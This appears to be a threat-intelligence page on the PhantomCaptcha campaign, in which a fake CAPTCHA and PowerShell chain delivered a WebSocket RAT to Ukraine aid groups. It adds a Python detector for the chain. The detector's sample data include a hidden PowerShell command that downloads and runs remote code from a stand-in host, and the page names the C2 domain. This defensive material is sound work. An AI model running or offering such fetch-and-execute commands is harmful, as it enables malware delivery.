
PhantomCaptcha WebSocket RAT PowerShell delivery chain

Malware Activity · H score 16 · 1 unique source, 1 article

Summary


PhantomCaptcha delivered a WebSocket RAT on October 8 through a multi-stage PowerShell chain that let operators run commands, exfiltrate data, and load more malware. The payload relied on a ClickFix-style fake CAPTCHA and weaponized PDFs to push victims into executing the code themselves, reducing file-based detection. The second stage gathered host details such as computer name and domain information, then sent them to attacker infrastructure. The final backdoor maintained repeated connections to wss://bsnowcommunications[.]com:80, preserving remote access after delivery.
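The chain above leaves three observable traces a defender can key on: a user-launched, hidden or encoded PowerShell process, a script block that reads the machine name and domain, and a WebSocket connection to the named C2 host on port 80. The detector below is an added example written for this page, not code from the original report; the log records are constructed, the parent-process and `$env:` heuristics are assumptions, and only the C2 host and port come from the summary.

```python
import re

# IoC from the summary above, kept defanged and refanged only for comparison.
C2_HOST = "bsnowcommunications[.]com".replace("[.]", ".")
C2_PORT = 80

# Assumed heuristic: the second stage profiles the host by reading these variables.
RECON_PATTERN = re.compile(r"\$env:(COMPUTERNAME|USERDOMAIN|USERDNSDOMAIN)", re.IGNORECASE)
# Assumed heuristic: ClickFix-style launches hide the window or pass an encoded command.
HIDDEN_FLAGS = re.compile(r"-(w(indowstyle)?\s+hidden|e(nc|ncodedcommand)?\s)", re.IGNORECASE)

def classify_event(ev: dict) -> list[str]:
    """Return the PhantomCaptcha-style signals matched by one normalised log record."""
    hits = []
    kind = ev.get("kind")
    if kind == "process":
        image = ev.get("image", "").lower()
        parent = ev.get("parent", "").lower()
        if image.endswith("powershell.exe") and parent.endswith("explorer.exe"):
            hits.append("interactive_powershell_launch")   # user ran it themselves
        if image.endswith("powershell.exe") and HIDDEN_FLAGS.search(ev.get("cmdline", "")):
            hits.append("hidden_or_encoded_powershell")
    elif kind == "scriptblock":
        if RECON_PATTERN.search(ev.get("text", "")):
            hits.append("host_profiling_scriptblock")
    elif kind == "network":
        host = ev.get("dest_host", "").lower().replace("[.]", ".")
        if host == C2_HOST:
            hits.append("known_c2_host")
        if ev.get("scheme") == "wss" and ev.get("dest_port") == C2_PORT:
            hits.append("wss_on_port_80")                  # TLS WebSocket on a plain-HTTP port
    return hits

def find_phantomcaptcha_signals(events) -> list[tuple[str, str]]:
    """Flatten all (event id, signal) pairs over a stream of records."""
    return [(ev["id"], h) for ev in events for h in classify_event(ev)]

# Constructed sample records: three malicious, two benign.
SAMPLE_EVENTS = [
    {"id": "evt1", "kind": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"iwr https://captcha-lure.invalid/s | iex\""},
    {"id": "evt2", "kind": "scriptblock", "text": "$n=$env:COMPUTERNAME; $d=$env:USERDOMAIN"},
    {"id": "evt3", "kind": "network", "dest_host": "bsnowcommunications[.]com",
     "dest_port": 80, "scheme": "wss"},
    {"id": "evt4", "kind": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": "powershell.exe", "cmdline": "powershell.exe -File build.ps1"},
    {"id": "evt5", "kind": "network", "dest_host": "example.com", "dest_port": 443, "scheme": "wss"},
]
```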

Related Happenings

AsyncRAT multi-stage delivery via trusted tools

Malware Activity
H score 22 · First: 11.06.2026 17:00 · Last: 11.06.2026 17:00 · Sources 1

About this happening: A **Windows** malware chain is now delivering **AsyncRAT**, increasing the risk of **stealthy remote access** on targeted systems. The lure uses **AI study guides** and **develope...

Vidar infostealer delivered through TikTok and Instagram Reels

Malware Activity
H score 27 · First: 10.06.2026 19:00 · Last: 10.06.2026 19:00 · Sources 1

About this happening: Threat actors are using **TikTok** and **Instagram Reels** to deliver **Vidar infostealer** through fake free-software tutorials, putting viewers at risk of **credential**, **fina...

Major web servers HTTP/2 Bomb remote DoS denial-of-service flaw

Vulnerability
H score 39 · First: 03.06.2026 11:33 · Last: 03.06.2026 11:33 · Sources 1

About this happening: Researchers disclosed **HTTP/2 Bomb**, a **remote denial-of-service** vulnerability in **default HTTP/2 configurations** that can make **NGINX, Apache HTTPD, Microsoft IIS, Envoy,...

Dohdoor backdoor activity on Windows endpoints

Malware Activity
H score 28 · First: 26.02.2026 17:17 · Last: 26.02.2026 17:17 · Sources 1

About this happening: A new **Dohdoor** backdoor is being used to provide **DNS-over-HTTPS (DoH)** C2 and **reflective payload execution** on **Windows** endpoints, increasing stealth and post-compromi...

MIMICRAT (aka AstarionRAT) ClickFix-delivered RAT activity

Malware Activity
H score 16 · First: 20.02.2026 13:55 · Last: 20.02.2026 13:55 · Sources 1

About this happening: The **MIMICRAT (aka AstarionRAT)** malware has been disclosed as a **ClickFix-delivered RAT** that enables **Windows token impersonation** and **SOCKS5 tunneling**, increasing the...

Timeline

  1. 24.10.2025 15:15 · 2 articles

    PhantomCaptcha spear phishing delivers a WebSocket RAT through a fake Cloudflare CAPTCHA

    Exploitation Observed

    On October 8, 2025, a single-day spear phishing campaign targeted Ukraine aid groups and Ukrainian regional government administrations with weaponized PDFs that impersonated the Ukrainian President’s Office, redirected victims through a fake Cloudflare CAPTCHA page, and used user-triggered PowerShell execution to deliver a multi-stage payload culminating in a WebSocket remote access Trojan.

  2. 24.10.2025 15:15 · 1 article

    SentinelOne report identifies Ukraine aid groups and regional administrations as PhantomCaptcha targets

    Initial Disclosure

    On October 22, 2025, SentinelOne identified individual members of the International Red Cross, Norwegian Refugee Council, UNICEF, the Council of Europe’s Register of Damage for Ukraine, and Ukrainian government administrations in the Donetsk, Dnipropetrovsk, Poltava and Mikolaevsk regions as targets of PhantomCaptcha.
